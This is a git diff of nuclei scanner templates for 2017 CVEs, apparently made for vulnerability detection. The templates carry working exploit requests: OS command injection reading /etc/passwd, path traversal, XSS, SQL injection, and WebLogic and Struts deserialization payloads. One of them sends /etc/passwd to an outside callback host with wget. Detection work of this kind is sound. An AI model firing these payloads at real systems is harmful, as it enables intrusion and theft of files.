"{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-14535.yaml b/nuclei-templates/CVE-2017/CVE-2017-14535.yaml new file mode 100644 index 0000000000..b116743885 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-14535.yaml @@ -0,0 +1,42 @@ +id: CVE-2017-14535 + +info: + name: Trixbox - 2.8.0.4 OS Command Injection + author: pikpikcu + severity: high + description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. + reference: + - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ + - https://www.exploit-db.com/exploits/49913 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 + - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2017-14535 + cwe-id: CWE-78 + tags: cve,cve2017,trixbox,rce,injection + +requests: + - raw: + - | + GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: de,en-US;q=0.7,en;q=0.3 + Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= + Connection: close + Cache-Control: max-age=0 + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2017/cve-2017-14651.yaml b/nuclei-templates/CVE-2017/CVE-2017-14651.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-14651.yaml rename to nuclei-templates/CVE-2017/CVE-2017-14651.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-14849.yaml b/nuclei-templates/CVE-2017/CVE-2017-14849.yaml new file mode 100644 index 0000000000..87a14fe679 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-14849.yaml @@ -0,0 +1,31 @@ +id: CVE-2017-14849 + +info: + name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal + author: Random_Robbie + severity: high + description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules. + reference: + - https://twitter.com/nodejs/status/913131152868876288 + - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ + - http://www.securityfocus.com/bid/101056 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-14849 + cwe-id: CWE-22 + tags: cve,cve2017,nodejs,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/static/../../../a/../../../../etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2017/CVE-2017-15647.yaml b/nuclei-templates/CVE-2017/CVE-2017-15647.yaml new file mode 100644 index 0000000000..eb06edfa05 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-15647.yaml @@ -0,0 +1,33 @@ +id: CVE-2017-15647 + +info: + name: FiberHome - Directory Traversal + author: daffainfo + severity: high + description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. + reference: + - https://www.exploit-db.com/exploits/44054 + - https://www.cvedetails.com/cve/CVE-2017-15647 + - https://blogs.securiteam.com/index.php/archives/3472 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-15647 + cwe-id: CWE-22 + tags: cve,cve2017,lfi,router + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-15944.yaml b/nuclei-templates/CVE-2017/CVE-2017-15944.yaml new file mode 100644 index 0000000000..ffbe9d78c8 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-15944.yaml @@ -0,0 +1,37 @@ +id: CVE-2017-15944 + +info: + name: Palo Alto Network PAN-OS - Remote Code Execution + author: emadshanab,milo2012 + severity: critical + description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. + reference: + - https://www.exploit-db.com/exploits/43342 + - https://security.paloaltonetworks.com/CVE-2017-15944 + - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-15944 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-15944 + tags: cve,cve2017,rce,vpn,panos,globalprotect + +requests: + - raw: + - | + GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{randstr}}; + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "@start@Success@end@" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-16806.yaml b/nuclei-templates/CVE-2017/CVE-2017-16806.yaml deleted file mode 100644 index 2a15ee382b..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-16806.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2017-16806 - -info: - name: Ulterius Server < 1.9.5.0 - Directory Traversal - author: geeknik - severity: high - description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs. - reference: - - https://www.exploit-db.com/exploits/43141 - - https://nvd.nist.gov/vuln/detail/CVE-2017-16806 - - https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee - - https://www.exploit-db.com/exploits/43141/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-16806 - cwe-id: CWE-22 - tags: cve,cve2017,ulterius,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" - - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - - "\\[(font|extension|file)s\\]" - condition: or - part: body - - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-17562.yaml b/nuclei-templates/CVE-2017/CVE-2017-17562.yaml new file mode 100644 index 0000000000..2289e470e0 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-17562.yaml @@ -0,0 +1,107 @@ +id: CVE-2017-17562 + +info: + name: Embedthis GoAhead RCE + author: geeknik + severity: high + description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. + reference: + - https://www.elttam.com/blog/goahead/ + - https://github.com/ivanitlearning/CVE-2017-17562 + - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562 + - https://github.com/embedthis/goahead/issues/249 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2017-17562 + cwe-id: CWE-20 + tags: cve,cve2017,rce,goahead,fuzz + +requests: + - raw: + - | + GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + payloads: + endpoint: + - admin + - apply + - non-CA-rev + - cgitest + - checkCookie + - check_user + - chn/liveView + - cht/liveView + - cnswebserver + - config + - configure/set_link_neg + - configure/swports_adjust + - eng/liveView + - firmware + - getCheckCode + - get_status + - getmac + - getparam + - guest/Login + - home + - htmlmgr + - index + - index/login + - jscript + - kvm + - liveView + - login + - login.asp + - login/login + - login/login-page + - login_mgr + - luci + - main + - main-cgi + - manage/login + - menu + - mlogin + - netbinary + - nobody/Captcha + - nobody/VerifyCode + - normal_userLogin + - otgw + - page + - rulectl + - service + - set_new_config + - sl_webviewer + - ssi + - status + - sysconf + - systemutil + - t/out + - top + - unauth + - upload + - variable + - wanstatu + - webcm + - webmain + - webproc + - webscr + - webviewLogin + - webviewLogin_m64 + - webviewer + - welcome + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + condition: and + words: + - "environment variable" + - "display library search paths" \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-3506.yaml b/nuclei-templates/CVE-2017/CVE-2017-3506.yaml new file mode 100644 index 0000000000..684bb51560 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-3506.yaml @@ -0,0 +1,52 @@ +id: CVE-2017-3506 + +info: + name: Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution + author: pdteam + severity: high + description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. + reference: + - https://hackerone.com/reports/810778 + - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html + - http://web.archive.org/web/20210124033731/https://www.securityfocus.com/bid/97884/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 7.4 + cve-id: CVE-2017-3506 + tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle + metadata: + max-request: 1 + +http: + - raw: + - | + POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, + Content-Type: text/xml;charset=UTF-8 + + + + + + + http://{{interactsh-url}} + + + + + + + + + + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/04/20 diff --git a/nuclei-templates/CVE-2017/CVE-2017-5631.yaml b/nuclei-templates/CVE-2017/CVE-2017-5631.yaml new file mode 100644 index 0000000000..d8e29efb22 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-5631.yaml @@ -0,0 +1,40 @@ +id: CVE-2017-5631 + +info: + name: KMCIS CaseAware - Cross-Site Scripting + author: edoardottt + severity: medium + description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. + reference: + - https://www.openbugbounty.org/incidents/228262/ + - https://www.exploit-db.com/exploits/42042/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-5631 + cwe-id: CWE-79 + tags: edb,cve,cve2017,xss,caseaware + +requests: + - method: GET + path: + - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'>" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2017/cve-2017-7391.yaml b/nuclei-templates/CVE-2017/CVE-2017-7391.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-7391.yaml rename to nuclei-templates/CVE-2017/CVE-2017-7391.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-7529.yaml b/nuclei-templates/CVE-2017/CVE-2017-7529.yaml new file mode 100644 index 0000000000..63d93927e1 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-7529.yaml @@ -0,0 +1,27 @@ +id: CVE-2017-7529 + +info: + name: Nginx Remote Integer Overflow + author: medbsq + severity: medium + +# https://www.cvebase.com/cve/2017/7529 +requests: + - method: GET + path: + - "{{BaseURL}}/" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Range: bytes=-17208,-9223372036854758792 + matchers-condition: and + matchers: + - type: word + words: + - "Server: nginx" + - "Content-Range" + condition: and + part: header + - type: status + status: + - 206 diff --git a/nuclei-templates/CVE-2017/CVE-2017-7921.yaml b/nuclei-templates/CVE-2017/CVE-2017-7921.yaml new file mode 100644 index 0000000000..cd9e3b9bde --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-7921.yaml @@ -0,0 +1,36 @@ +id: CVE-2017-7921 + +info: + name: Hikvision - Authentication Bypass + author: princechaddha + severity: critical + description: Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. + reference: + - http://www.hikvision.com/us/about_10805.html + - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 + - https://nvd.nist.gov/vuln/detail/CVE-2017-7921 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2017-7921 + cwe-id: CWE-287 + tags: cve,cve2017,auth-bypass,hikvision + +requests: + - method: GET + path: + - "{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + words: + - "application/xml" + part: header + +# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-9805.yaml b/nuclei-templates/CVE-2017/CVE-2017-9805.yaml new file mode 100644 index 0000000000..ed28aec5cd --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-9805.yaml @@ -0,0 +1,100 @@ +id: CVE-2017-9805 + +info: + name: Apache Struts2 S2-052 - Remote Code Execution + author: pikpikcu + severity: high + description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. + reference: + - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html + - https://struts.apache.org/docs/s2-052.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2017-9805 + cwe-id: CWE-502 + tags: cve,cve2017,apache,rce,struts,kev + metadata: + max-request: 2 + +http: + - method: POST + path: + - "{{BaseURL}}/struts2-rest-showcase/orders/3" + - "{{BaseURL}}/orders/3" + headers: + Content-Type: application/xml + body: | + + + + 0 + + + + + + false + 0 + + + + + + wget + --post-file + /etc/passwd + {{interactsh-url}} + + false + + + + + java.lang.ProcessBuilder + start + + + asdasd + + asdasd + + + + + + false + 0 + 0 + false + + false + + + + 0 + + + + + + + + + + + matchers-condition: and + matchers: + + - type: word + words: + - "Debugging information" + - "com.thoughtworks.xstream.converters.collections.MapConverter" + condition: and + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/04/20 diff --git a/nuclei-templates/CVE-2017/cve-2017-1000028.yaml b/nuclei-templates/CVE-2017/cve-2017-1000028.yaml new file mode 100644 index 0000000000..c1eb936feb --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-1000028.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-1000028 + +info: + name: GlassFish LFI + author: pikpikcu + severity: high + description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. + reference: https://www.exploit-db.com/exploits/45196 + tags: cve,cve2017,oracle,glassfish,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-1000028 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + matchers-condition: and + matchers: + - type: word + words: + - "/sbin/nologin" + part: body + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-10075.yaml b/nuclei-templates/CVE-2017/cve-2017-10075.yaml new file mode 100644 index 0000000000..3083d00632 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-10075.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-10075 + +info: + name: Oracle Content Server XSS + author: madrobot + severity: high + description: The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. + reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html + tags: cve,cve2017,xss,oracle + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N + cvss-score: 8.20 + cve-id: CVE-2017-10075 + +requests: + - method: GET + path: + - "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO" + - "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body diff --git a/nuclei-templates/CVE-2017/cve-2017-10271.yaml b/nuclei-templates/CVE-2017/cve-2017-10271.yaml new file mode 100644 index 0000000000..4af42b1f0f --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-10271.yaml @@ -0,0 +1,61 @@ +id: CVE-2017-10271 + +info: + name: CVE-2017-10271 + author: dr_set + severity: high + description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + reference: + - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 + - https://github.com/SuperHacker-liuan/cve-2017-10271-poc + tags: cve,cve2017,rce,oracle,weblogic,oast + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2017-10271 + +requests: + - raw: + - | + POST /wls-wsat/CoordinatorPortType HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + Content-Type: text/xml + + + + + + + + + + /bin/bash + + + -c + + + nslookup {{interactsh-url}} + + + + + + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS interaction + words: + - "dns" + + - type: status + status: + - 500 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-11444.yaml b/nuclei-templates/CVE-2017/cve-2017-11444.yaml new file mode 100644 index 0000000000..324b2e11ac --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-11444.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-11444 + +info: + name: Subrion CMS SQL Injection + author: dwisiswant0 + severity: critical + description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array. + reference: + - https://github.com/intelliants/subrion/issues/479 + - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q + tags: cve,cve2017,sqli,subrion + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-11444 + cwe-id: CWE-89 + +requests: + - method: GET + path: + - "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1" + matchers-condition: and + matchers: + - type: word + words: + - "projectdiscovery.io" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-11586.yaml b/nuclei-templates/CVE-2017/cve-2017-11586.yaml new file mode 100644 index 0000000000..de488dde1e --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-11586.yaml @@ -0,0 +1,48 @@ +id: CVE-2017-11586 + +info: + name: FineCMS <5.0.9 - Open Redirect + author: 0x_Akoko + severity: medium + description: | + FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Upgrade to FineCMS version 5.0.9 or later to fix the open redirect vulnerability. + reference: + - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse + - https://nvd.nist.gov/vuln/detail/CVE-2017-11586 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-11586 + cwe-id: CWE-601 + epss-score: 0.00121 + epss-percentile: 0.46136 + cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: finecms + product: finecms + tags: cve,cve2017,redirect,finecms + +http: + - raw: + - | + POST /index.php?s=member&c=login&m=index HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + back=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1 + - | + GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: regex + part: header + regex: + - 'Refresh:(.*)url=http:\/\/interact\.sh' +# digest: 4b0a00483046022100b9dd6b07bd9874ead239ed591f16da9a600ac73cdc8404ed8e9bcc90e3918104022100bbe20d6aa691239c1573bbf7ccd5993f2127b310bae7ce921c22cc05c615efdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-12149.yaml b/nuclei-templates/CVE-2017/cve-2017-12149.yaml deleted file mode 100755 index 36c664da7b..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-12149.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2017-12149 - -info: - name: Java/Jboss Deserialization [RCE] - author: fopina - severity: critical - description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 - - https://chowdera.com/2020/12/20201229190934023w.html - - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 - tags: cve,cve2017,jboss,java,rce,deserialization - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2017-12149 - cwe-id: CWE-502 - -requests: - - raw: - - | - POST /invoker/JMXInvokerServlet/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/octet-stream - - {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} - - | - POST /invoker/EJBInvokerServlet/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/octet-stream - - {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} - - matchers-condition: and - matchers: - - type: word - words: - - "ClassCastException" - part: body - - - type: word - words: - - "application/x-java-serialized-object" - part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-12583.yaml b/nuclei-templates/CVE-2017/cve-2017-12583.yaml deleted file mode 100644 index 232be74216..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-12583.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2017-12583 - -info: - name: Reflected XSS in doku.php - author: DhiyaneshDK - severity: medium - metadata: - shodan-query: 'http.title:"DokuWiki"' - description: "DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php." - reference: https://github.com/splitbrain/dokuwiki/issues/2061 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2017-12583 - cwe-id: CWE-79 - tags: cve,cve2017,xss,dokuwiki - -requests: - - method: GET - path: - - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Unable to parse at parameter "".' - - - type: word - part: header - words: - - 'text/html' - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-12637.yaml b/nuclei-templates/CVE-2017/cve-2017-12637.yaml new file mode 100644 index 0000000000..681d71740a --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-12637.yaml @@ -0,0 +1,33 @@ +id: CVE-2017-12637 + +info: + name: Directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5 + author: apt-mirror + severity: high + description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. + tags: cve,cve2017,sap,lfi,java,traversal + reference: + - https://www.cvedetails.com/cve/CVE-2017-12637/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 + - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-12637 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.." + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "WEB-INF" + - "META-INF" + condition: and + part: body diff --git a/nuclei-templates/CVE-2017/cve-2017-12794.yaml b/nuclei-templates/CVE-2017/cve-2017-12794.yaml new file mode 100644 index 0000000000..ad1ea847cc --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-12794.yaml @@ -0,0 +1,38 @@ +id: CVE-2017-12794 + +info: + name: Django debug page XSS + author: pikpikcu + severity: medium + reference: + - https://twitter.com/sec715/status/1406779605055270914 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 + description: | + In Django 1.10.x before 1.10.8 and 